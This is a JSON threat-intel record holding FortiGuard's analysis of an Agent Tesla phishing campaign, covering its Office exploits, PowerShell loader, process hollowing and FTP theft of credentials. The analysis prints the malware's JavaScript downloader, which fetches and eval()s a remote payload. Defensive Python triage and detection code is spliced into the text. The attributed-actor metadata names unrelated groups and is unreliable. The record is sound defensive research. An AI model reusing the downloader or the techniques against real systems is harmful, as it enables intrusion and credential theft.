{
	"id": "14f90200-db22-4e56-95fe-cb90c41a6e40",
	"created_at": "2026-04-06T03:36:13.441949Z",
	"updated_at": "2026-04-10T03:37:09.171696Z",
	"deleted_at": null,
	"sha1_hash": "8d05480fff0d069e0a873a92eabc9761b83dd8fb",
	"title": "New Agent Tesla Campaign Targeting Spanish-Speaking People | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2826830,
	"plain_text": "New Agent Tesla Campaign Targeting Spanish-Speaking People |\r\nFortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2024-06-07 · Archived: 2026-04-06 03:09:00 UTC\r\nAffected Platforms: Microsoft Windows\r\nImpacted Users: Windows Users\r\nImpact: Collects sensitive information from a victim’s computer\r\nSeverity Level: Critical\r\nA new phishing campaign was recently captured by FortiGuard Labs that spreads a new Agent Tesla variant targeting Spanish-speaking people.\r\nSecurity researchers have detected Agent Tesla campaigns from time to time for years. Agent Tesla is a well-known .NET-based Remote Access Trojan (RAT) designed to stealthily infiltrate victims’ computers and steal sensitive information: hardware details, login user information, keystrokes, email contacts, web browser cookie files, system clipboard data, screenshots, basic information such as the login user name, computer name, OS, CPU and RAM, and saved credentials from widely installed software.\r\nIn-depth research on this campaign shows that it also leverages multiple techniques to deliver the Agent Tesla core module, such as known MS Office vulnerabilities, JavaScript code, PowerShell code, and fileless modules, which also hinder analysis by security researchers.\r\nIn this analysis, I will elaborate on how the campaign loads Agent Tesla onto a victim’s computer, how it starts, what sensitive data it is able to collect, and how it sends the stolen data to the attacker.\r\nThe Phishing Email\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 1 of 15\n\nFigure 1 – The phishing email.\r\nAs you can see from the above screenshot, the phishing email was written in Spanish. 
The message translated into English reads as:\r\nGood day\r\nAttached is proof of payment made to your account according to your client's instructions.\r\nThe phishing email looks like a standard SWIFT transfer notification from a large financial institution and carries a disguised Excel attachment (transferencia_swift_87647574684.xla), as shown in Figure 1.\r\nAs you may have noticed, the FortiClient service marked the phishing email with “[virus detected]” to warn the user about the attached Excel document.\r\nThe Excel Document\r\nThe Excel document is in OLE format with crafted embedded data that exploits the CVE-2017-0199 vulnerability. It contains an embedded OLE hyperlink that is opened automatically once the victim starts the Excel document. The hyperlink in the document is “hxxp[:]//ilang[.]in/QqBbmc”, as shown in Figure 2.\r\nFigure 2 – Embedded OLE hyperlink to an online RTF document.\r\nOnce the victim opens the Excel file, it automatically downloads an RTF document, which is then opened by Word. Figure 3 shows the traffic and how the URL downloads the RTF document.\r\nFigure 3 – The equation content inside the RTF document.\r\nCVE-2017-11882 is Exploited\r\nCVE-2017-11882 is an RCE (Remote Code Execution) vulnerability in Microsoft Office’s Equation Editor component (EQNEDT32.EXE). It can be exploited through Excel, Word, PowerPoint, and RTF documents as long as they contain crafted equation data in an OLE object. Successful exploitation allows an attacker to execute arbitrary code on a victim's computer.\r\nThis stack buffer overflow overwrites a return address on the stack of EQNEDT32.EXE. 
The hijacked process then jumps to and executes the malicious code that was copied onto the stack.\r\nFigure 4 – Crafted equation data.\r\nFigure 4 shows the crafted equation data extracted from the downloaded RTF document. The data marked in red is a fixed address inside EQNEDT32.EXE (the module is not randomized by ASLR, which is why a hardcoded address works) that overwrites a return address on the stack when the buffer overflow occurs.\r\nOnce the shellcode is executed, it downloads JavaScript code from a website and executes it on the victim’s computer. In Figure 5, the shellcode is about to call the API URLDownloadToFileW() to download the JavaScript file from “hxxp[:]//equalizerrr[.]duckdns.org/eveningdatingforeveryone.js” to the local file “C:\\Users\\Bobs\\AppData\\Roaming\\morningdatingroses.js.”\r\nFigure 5 – Shellcode to download a JavaScript file to local.\r\nIt then calls the API ShellExecuteW() to execute the JavaScript file (the Windows program WScript.exe is invoked to run the JS file). Finally, it exits the process by calling the API ExitProcess().\r\nJavaScript Files Lead to PowerShell Code Execution\r\nBelow is a code snippet of the JavaScript file. 
It continues by downloading another file from “hxxps[:]//paste[.]ee/d/yWWXG”; the URL is stored reversed and restored at run time. The downloaded content is then executed by passing it to eval().\r\nmorningdatingroses.js:\r\nvar paparicos = new ActiveXObject(\"MSXML2.XMLHTTP\"); // HTTP client via ActiveX\r\nvar alijar = \"GXWWy/d/ee.etsap//:sptth\".split(\"\").reverse().join(\"\"); // reversed literal; restores the stage-2 URL\r\npaparicos.open(\"GET\", alijar, false); // synchronous GET\r\npaparicos.send();\r\nvar vomitar = \"\";\r\nif (paparicos.status === 200) {\r\n    vomitar = paparicos.responseText;\r\n}\r\nfunction estarostia(piguancha) {\r\n    eval(piguancha); // execute whatever the server returned\r\n}\r\nestarostia(vomitar);\r\nFigure 6 – Base64 encoded PowerShell code.\r\nWhen the URL is opened in a web browser, the content looks like normal JavaScript code, but it contains a piece of malicious code with base64-encoded PowerShell. That code is decoded, combined with other code, and executed inside a “powershell.exe” process, as you can see in Figure 6.\r\nThe PowerShell code’s purpose includes:\r\n1. Downloading a normal jpg file with a base64-encoded .NET module (the loader-module) appended to it. The URL of the jpg file is a constant string: “hxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778”.\r\n2. Extracting the loader-module from the jpg file, base64-decoding it, and loading it into PowerShell’s memory.\r\n3. Calling the loader-module’s VAI() method under the namespace PROJETOAUTOMACAO.VB and the class Home.\r\nPlease refer to Figure 7 for more information about the PowerShell code.\r\nFigure 7 – The base64 decoded PowerShell code.\r\nThe loader-module is a fileless module that is never saved to the local disk. 
This makes it difficult for a researcher to notice the module without a step-by-step, in-depth analysis.\r\nThe first argument to the method VAI() is a reversed URL to the Agent Tesla core module, which is “hxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt.” The second argument is a switch: if it is “1,” the loader establishes persistence on the victim’s computer by adding itself to the auto-run group in the system’s registry. In this case it is “desativado” (Portuguese for “disabled”), so no persistence is established.\r\nThe penultimate argument is a process name, which for this variant is “AddInProcess32.”\r\nA Look into the Loader-Module\r\nThe loader-module, running inside the PowerShell process, downloads a file from the URL passed as the first argument and keeps it in memory. This is the Agent Tesla core module, as shown in Figure 8.\r\nFigure 8 – Loader-module downloads Agent Tesla executable.\r\nAfterward, it starts the “AddInProcess32” process in a suspended state by calling the API CreateProcessA() with creation flags 0x80000004, which include CREATE_SUSPENDED (0x4).\r\nNext, the loader-module performs process hollowing: it copies the Agent Tesla executable into the suspended process and executes it within “AddInProcess32.exe.” 
To do this, it calls APIs such as GetThreadContext(), VirtualAllocEx(), WriteProcessMemory(), SetThreadContext(), and ResumeThread().\r\nFigure 9 shows the process tree outlining the complete picture, starting from the Excel document and ending with Agent Tesla running inside “AddInProcess32.exe.”\r\nFigure 9 – Process tree of the relevant processes.\r\nAgent Tesla Executable Module\r\nThis variant of Agent Tesla is a 32-bit .NET Framework program that is obfuscated and runs as a fileless module. Figure 10 shows a debugger breaking Agent Tesla at the EntryPoint method, where the namespaces, classes, methods, and code flow are all obfuscated.\r\nFigure 10 – Obfuscated Agent Tesla executable in a debugger.\r\nA dedicated method detects whether it is running in an analysis environment. It performs the following checks:\r\nIt calls the Windows API CheckRemoteDebuggerPresent() to determine whether it is being debugged.\r\nAgent Tesla calculates the difference between two tick counts taken before and after sleeping for ten milliseconds to detect whether it is being debugged or running in a VM.\r\nIt checks whether AV- or sandbox-related DLLs are loaded in the current process, such as \"SbieDLL.dll\" for Sandboxie, \"SxIn.dll\" for Qihu 360, \"Sf2.dll\" for Avast, \"snxhk.dll\" for Sophos Intercept X, and \"cmdvrt32.dll\" for Comodo.\r\nAgent Tesla checks whether it is running in a virtualization environment by executing two WMI queries that retrieve the computer’s hardware information, such as the “Manufacturer,” “Model,” and the “Name” of the video controller. It then looks for keywords such as “Microsoft corporation,” “VMware,” “VIRTUAL,” “VirtualBox,” and “VBox” in the retrieved hardware information.\r\nIt visits the URL “hxxp://ip-api[.]com/line/?fields=hosting” and checks whether the response is “true,” which tells it that its public IP address belongs to a hosting provider or a data center.\r\nIf any of the above checks returns ‘true,’ it exits the process.\r\nSensitive Information Stolen from the Victim Device\r\nIn this section, I will review Agent Tesla’s features: how this variant collects credentials and email contacts from the victim’s device, which software it collects them from, and the basic information it gathers about the victim’s device.\r\nIt steals saved credentials from web browsers grouped as Chromium-based and Mozilla-based, because browsers in each family use the same profile folder structure and files to store credentials.\r\nFor Chromium-based browsers, it reads saved credentials from the “Login Data” files under the browser’s profile folder. Figure 11 shows that it has just obtained some “Opera Browser” (a Chromium-based browser) credentials from the profile files “{browser’s profile path}\\Default\\Login Data” and “{browser’s profile path}\\Login Data.”\r\nFigure 11 – Stolen credentials from Chromium-based browser.\r\nFigure 12 – Stolen credentials from Mozilla-based browser.\r\nFigure 12 shows it has just obtained credentials from a Firefox browser’s profile.\r\nThis variant steals credentials from the following web browsers.\r\nChromium-based Web Browsers\r\n\"Orbitum,\" \"Elements Browser,\" \"Cool Novo,\" \"Sputnik,\" \"360 Browser,\" \"Uran,\" \"Iridium Browser,\" \"Liebao Browser,\" \"Vivaldi,\" \"Chromium,\" \"Sleipnir 6,\" \"Coowon,\" \"Coccoc,\" \"Amigo,\" \"Chedot,\" \"Epic Privacy,\" \"CentBrowser,\" \"Edge Chromium,\" \"Chrome,\" \"Citrio,\" \"Opera Browser,\" \"QIP Surf,\" \"Brave,\" \"Kometa,\" \"Comodo Dragon,\" \"7Star,\" \"Torch Browser,\" \"Yandex Browser.\"\r\nMozilla-based Web Browsers\r\n\"Firefox,\" \"CyberFox,\" \"WaterFox,\" \"K-Meleon,\" \"Postbox,\" \"Thunderbird browser,\" \"IceCat,\" \"Flock,\" \"IceDragon,\" \"BlackHawk,\" \"PaleMoon,\" and \"SeaMonkey.\"\r\nOther than the above web browsers, Agent Tesla looks for more saved credentials in a wide range of software, which I have categorized below.\r\nOther Web Browsers:\r\n\"Falkon Browser,\" \"Flock Browser,\" \"IE/Edge,\" \"QQ Browser,\" \"Safari for Windows,\" and \"UC Browser.\"\r\nEmail clients:\r\n\"Outlook,\" \"Opera Mail,\" \"PocoMail,\" \"The Bat!,\" \"Becky!,\" \"ClawsMail,\" \"FoxMail,\" \"IncrediMail,\" \"eM Client,\" \"Mailbird,\" \"Eudora,\" and \"Windows Mail App.\"\r\nFTP clients:\r\n\"CoreFTP,\" \"Flash FXP,\" \"FTPGetter,\" \"FTP Navigator,\" \"FileZilla,\" \"SmartFTP,\" \"FtpCommander,\" \"WinSCP,\" and \"WS_FTP.\"\r\nVPN and VNC clients:\r\n\"NordVPN,\" \"TightVNC,\" \"RealVNC,\" \"UltraVNC,\" \"OpenVPN,\" and \"Private Internet Access.\"\r\nIM clients:\r\n\"Discord,\" \"Pidgin,\" \"Trillian,\" \"Psi/Psi+,\" and \"Paltalk.\"\r\nOthers:\r\n\"MysqlWorkbench,\" \"DynDns,\" \"Microsoft Credentials,\" \"Internet Downloader Manager,\" and \"JDownloader.\"\r\nAgent Tesla can also collect the victim’s email contacts if they use Thunderbird as their email client. Under the Thunderbird profile folder there is a file named global-messages-db.sqlite. It is an SQLite database that stores an index of all messages, including attachments, BCC and CC addresses, folder names, and more. Agent Tesla extracts all contacts (email addresses) from this file.\r\nFigure 13 – Agent Tesla collects contacts from the victim.\r\nBased on my analysis, some features of this variant are disabled (their switch variables are set to “false” by default), such as the keylogger, the screen logger, the system clipboard logger, and cookie collection. 
Refer to Figure 14 for details.\r\nFigure 14 – Some features are disabled by default.\r\nAgent Tesla also collects information about the victim’s computer, such as the system date and time, login user name, computer name, public IP address, OS full name, CPU information, and RAM capacity.\r\nSubmitting Stolen Data to an FTP Server\r\nIn the past, we captured many Agent Tesla variants that used HTTP POST and SMTP to submit their stolen data to their C2 server. This variant instead submits the data it collects from the victim’s device over the FTP protocol. The FTP server address and its credentials are plaintext strings held in global variables.\r\nFigure 15 – Submit stolen data via FTP.\r\nFigure 15 is a screenshot of Agent Tesla about to submit credentials stolen from my test machine using the FTP command “STOR.” The file name on the FTP server has the format “PW_{User name-Computer name_System Date&Time}.html”; the content is the stolen data in HTML format.\r\nThe collected email contacts are in a txt file named “Contacts_Thunderbird.txt_{User name-Computer name_System Date&Time}.txt”. One example from my test machine is “Contacts_Thunderbird.txt_Bobs-BOBS-PC_2024_05_17_17_34_21.txt”. 
The txt file contains all the email addresses collected from Thunderbird.\r\nSummary\r\nIn this analysis, I went through the entire process of the Agent Tesla campaign targeting Spanish-speaking people. The flowchart in Figure 16 outlines this complex malicious campaign, from the phishing email to the stolen information being submitted to an FTP server.\r\nFigure 16 – The whole process of this Agent Tesla campaign.\r\nWe also examined how it uses multiple techniques to hinder analysis, such as exploiting two Microsoft Office vulnerabilities carried by the Excel and RTF documents, executing JavaScript and PowerShell scripts, and base64-encoding most downloaded files.\r\nNext, we looked at how the fileless loader-module is called to download the Agent Tesla executable and run it in a process-hollowed AddInProcess32.exe process.\r\nI then elaborated on how Agent Tesla detects whether it is running in an analysis environment, such as a sandbox or virtual machine, or where AV software such as Avast or Comodo is running.\r\nWe then looked at the functions this variant performs on the victim’s device. It collects saved credentials from over 80 popular software applications and the victim’s email contacts from Thunderbird profile files.\r\nFinally, you learned how this Agent Tesla variant submits the sensitive data it has harvested from the victim’s device to an FTP server using the “STOR” command. 
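The staging steps recapped above lend themselves to a small triage tool. The following Python is an added example written for this page; it is not code from the FortiGuard article and not the malware's own code. It recovers URLs hidden with the JavaScript split/reverse/join idiom and carves a base64-encoded module appended to a JPEG, the two manual steps an analyst repeats for every new sample in this chain. The sample script, the stand-in URL, the fake module contents, and the assumption that the payload sits after the JPEG end-of-image marker are all constructed for the example; the article only says the module is appended to the jpg and does not state how it is delimited.

```python
import base64

# The snippet deliberately contains no literal double-quote character, so the
# quote used by the JavaScript is built at run time.
DQ = chr(34)
NL = chr(10)

# JavaScript idiom used by the downloader: '<literal>'.split('').reverse().join('')
REVERSE_MARKER = '.split(' + DQ + DQ + ').reverse().join(' + DQ + DQ + ')'
JPEG_EOI = bytes.fromhex('ffd9')   # JPEG end-of-image marker


def unreverse_js_strings(js_source):
    # Return (obfuscated, recovered) pairs for every double-quoted literal that is
    # immediately followed by the split/reverse/join idiom.
    found = []
    pos = js_source.find(REVERSE_MARKER)
    while pos != -1:
        if pos > 0 and js_source[pos - 1] == DQ:
            start = js_source.rfind(DQ, 0, pos - 1)   # opening quote of the literal
            if start != -1:
                literal = js_source[start + 1:pos - 1]
                found.append((literal, literal[::-1]))
        pos = js_source.find(REVERSE_MARKER, pos + 1)
    return found


def carve_appended_payload(image_bytes):
    # Assumption (not stated in the article): the base64 text follows the last
    # JPEG end-of-image marker. Returns the decoded bytes when they look like a
    # PE/.NET image (start with MZ), otherwise None.
    eoi = image_bytes.rfind(JPEG_EOI)
    if eoi == -1:
        return None
    trailer = image_bytes[eoi + len(JPEG_EOI):].strip()
    if not trailer:
        return None
    try:
        decoded = base64.b64decode(trailer)   # whitespace inside is discarded by default
    except (ValueError, TypeError):           # binascii.Error is a ValueError subclass
        return None
    return decoded if decoded.startswith(b'MZ') else None


def triage(js_source, image_bytes):
    # Tie the two steps together the way the chain does: recover the stage-2 URL
    # from the script, then pull the loader out of the image trailer and check
    # that it names the class the PowerShell stage calls into.
    urls = [recovered for _, recovered in unreverse_js_strings(js_source)]
    module = carve_appended_payload(image_bytes)
    return {
        'stage2_urls': urls,
        'module_size': len(module) if module else 0,
        'names_vai_loader': bool(module) and b'PROJETOAUTOMACAO' in module,
    }


# Constructed sample input: a stand-in URL and a fake module, not the campaign's
# real artifacts. The script mirrors the shape of morningdatingroses.js.
STAGE2_URL = 'https://example.invalid/d/stage2'
SAMPLE_JS = (
    'var paparicos = new ActiveXObject(' + DQ + 'MSXML2.XMLHTTP' + DQ + ');' + NL
    + 'var alijar = ' + DQ + STAGE2_URL[::-1] + DQ + REVERSE_MARKER + ';' + NL
    + 'paparicos.open(' + DQ + 'GET' + DQ + ', alijar, false);'
)
FAKE_MODULE = b'MZ' + bytes(62) + b'PROJETOAUTOMACAO.VB Home VAI (constructed stand-in)'
SAMPLE_JPG = (
    bytes.fromhex('ffd8ffe000104a46494600010100000100010000')   # SOI + minimal APP0
    + JPEG_EOI                                                  # EOI
    + base64.b64encode(FAKE_MODULE)                             # appended loader
)

if __name__ == '__main__':
    print(triage(SAMPLE_JS, SAMPLE_JPG))
```

On a real sample, pass the bytes of the downloaded jpg to carve_appended_payload() and the text of the script to unreverse_js_strings(); anything the carver returns should go straight into a .NET decompiler, never be executed.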
\r\nFortinet Protections\r\nFortinet customers are already protected from this campaign by FortiGuard’s AntiSPAM, Web Filtering, and AntiVirus services as follows:\r\nThe downloading URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nFortiMail recognizes the phishing email as “virus detected.” In addition, real-time anti-phishing provided by FortiSandbox embedded in Fortinet’s FortiMail, web filtering, and antivirus solutions provides advanced protection against both known and unknown phishing attempts.\r\nThe FortiGuard Antivirus service detects the attached Excel document, the downloaded RTF document, and the Agent Tesla executable file with the following AV signatures:\r\nMSExcel/CVE_2017_0199.DDOC!exploit\r\nMSOffice/CVE_2017_11882.B!exploit\r\nMSIL/AgentTesla.B!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is part of each solution. As a result, customers who have these products with up-to-date protections are already protected.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the malicious Equation data inside the Excel document.\r\nYou can also view FortiGuard Labs' previously released outbreak alert on Agent Tesla. To stay informed of new and emerging threats, you can sign up to receive future alerts.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team. 
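Independently of any vendor product, the process tree in Figure 9 and the upload names in Figure 15 can be turned into detection logic. The following Python is an added example for this page, not Fortinet's code and not from the article. The process-creation events, PIDs, benign rows, and FTP command log are constructed; the rule that flags EQNEDT32.EXE by image name alone reflects two facts not spelled out on the page: Equation Editor was removed from Office in the January 2018 updates, so any launch is worth a look, and it is started as a COM server, so process telemetry usually records svchost.exe (DcomLaunch) rather than the Office application as its parent.

```python
import re

SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}
HOLLOW_TARGETS = {'addinprocess32.exe', 'addinprocess.exe'}   # .NET Framework add-in hosts

# Upload names observed on the FTP server in this campaign:
#   PW_{user}-{host}_{YYYY_MM_DD_HH_MM_SS}.html
#   Contacts_Thunderbird.txt_{user}-{host}_{YYYY_MM_DD_HH_MM_SS}.txt
TIMESTAMP = '[0-9]{4}(_[0-9]{2}){5}'
EXFIL_NAME = re.compile('^(PW_.+_' + TIMESTAMP + '[.]html'
                        + '|Contacts_Thunderbird[.]txt_.+_' + TIMESTAMP + '[.]txt)$')


def classify(event, by_pid):
    # Map one process-creation event to the step of the chain it matches, or None.
    image = event['image'].lower()
    parent = by_pid.get(event['ppid'])
    pimage = parent['image'].lower() if parent else ''
    if image == 'eqnedt32.exe':
        # Keyed on the image, not the parent: Equation Editor is a COM server, so
        # its recorded parent is typically svchost.exe rather than EXCEL.EXE.
        return 'equation_editor_launched'
    if pimage == 'eqnedt32.exe':
        return 'equation_editor_spawns_child'        # CVE-2017-11882 payload execution
    if pimage in SCRIPT_HOSTS and image == 'powershell.exe':
        return 'script_host_spawns_powershell'       # wscript.exe -> powershell.exe
    if pimage == 'powershell.exe' and image in HOLLOW_TARGETS:
        return 'powershell_spawns_addinprocess'      # hollowing target
    return None


def ancestry(pid, by_pid):
    # Walk parent links back to the root so an alert carries the full chain.
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]['image'])
        pid = by_pid[pid]['ppid']
    return ' > '.join(reversed(chain))


def detect_chain(events):
    by_pid = {e['pid']: e for e in events}
    findings = []
    for e in events:
        rule = classify(e, by_pid)
        if rule:
            findings.append((rule, e['pid'], ancestry(e['pid'], by_pid)))
    return findings


def find_exfil_uploads(ftp_log_lines):
    # Return the STOR targets whose names follow the campaign's naming scheme.
    hits = []
    for line in ftp_log_lines:
        tokens = line.split()
        if 'STOR' in tokens:
            idx = tokens.index('STOR')
            if idx + 1 < len(tokens) and EXFIL_NAME.match(tokens[idx + 1]):
                hits.append(tokens[idx + 1])
    return hits


# Constructed process-creation events (Sysmon event 1 style, trimmed to what the
# rules need). PIDs and the benign rows are invented for the example.
EVENTS = [
    {'pid': 50,  'ppid': 4,   'image': 'svchost.exe'},
    {'pid': 100, 'ppid': 4,   'image': 'explorer.exe'},
    {'pid': 200, 'ppid': 100, 'image': 'EXCEL.EXE'},
    {'pid': 400, 'ppid': 50,  'image': 'EQNEDT32.EXE'},
    {'pid': 500, 'ppid': 400, 'image': 'wscript.exe'},
    {'pid': 600, 'ppid': 500, 'image': 'powershell.exe'},
    {'pid': 700, 'ppid': 600, 'image': 'AddInProcess32.exe'},
    {'pid': 800, 'ppid': 100, 'image': 'powershell.exe'},   # interactive shell, benign
]

# Constructed FTP command log; the two upload names follow the formats in Figure 15.
FTP_LOG = [
    '2024-05-17 17:34:20 USER uploader',
    '2024-05-17 17:34:21 STOR PW_Bobs-BOBS-PC_2024_05_17_17_34_21.html',
    '2024-05-17 17:34:22 STOR Contacts_Thunderbird.txt_Bobs-BOBS-PC_2024_05_17_17_34_21.txt',
    '2024-05-17 17:35:00 STOR quarterly_report.pdf',
]

if __name__ == '__main__':
    for rule, pid, chain in detect_chain(EVENTS):
        print(rule, pid, chain)
    print(find_exfil_uploads(FTP_LOG))
```

The four process rules fire on different steps of the same chain, so an alert on any one of them should be enriched with ancestry() output; the FTP name check is only useful where outbound FTP commands are logged, which is itself a reason to block or proxy outbound FTP from user workstations.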
\r\nIOCs\r\nURLs\r\nhxxps[:]//ilang[.]in/QqBbmc\r\nhxxp[:]//equalizerrr[.]duckdns[.]org/eveningdatingforeveryone.js\r\nhxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt\r\nhxxps[:]//paste[.]ee/d/yWWXG\r\nhxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778\r\nFTP Server List\r\nftp[.]fosna.net\r\nRelevant Sample SHA-256\r\n[transferencia_swift_87647574684.xla]\r\n8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7\r\n[RTF document]\r\n208AF8E2754A3E55A64796B29EF3A625D89A357C59C43D0FF4D2D30E20092D74\r\n[The loader-module]\r\n7230CC614270DCA79415B0CF53A666A219BEB4BEED90C85A1AC09F082AEA613B\r\n[Agent Tesla Executable]\r\nA1475A0042FE86E50531BB8B8182F9E27A3A61F204700F42FD26406C3BDEC862\r\nSource: https://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people"
	],
	"report_names": [
		"new-agent-tesla-campaign-targeting-spanish-speaking-people"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
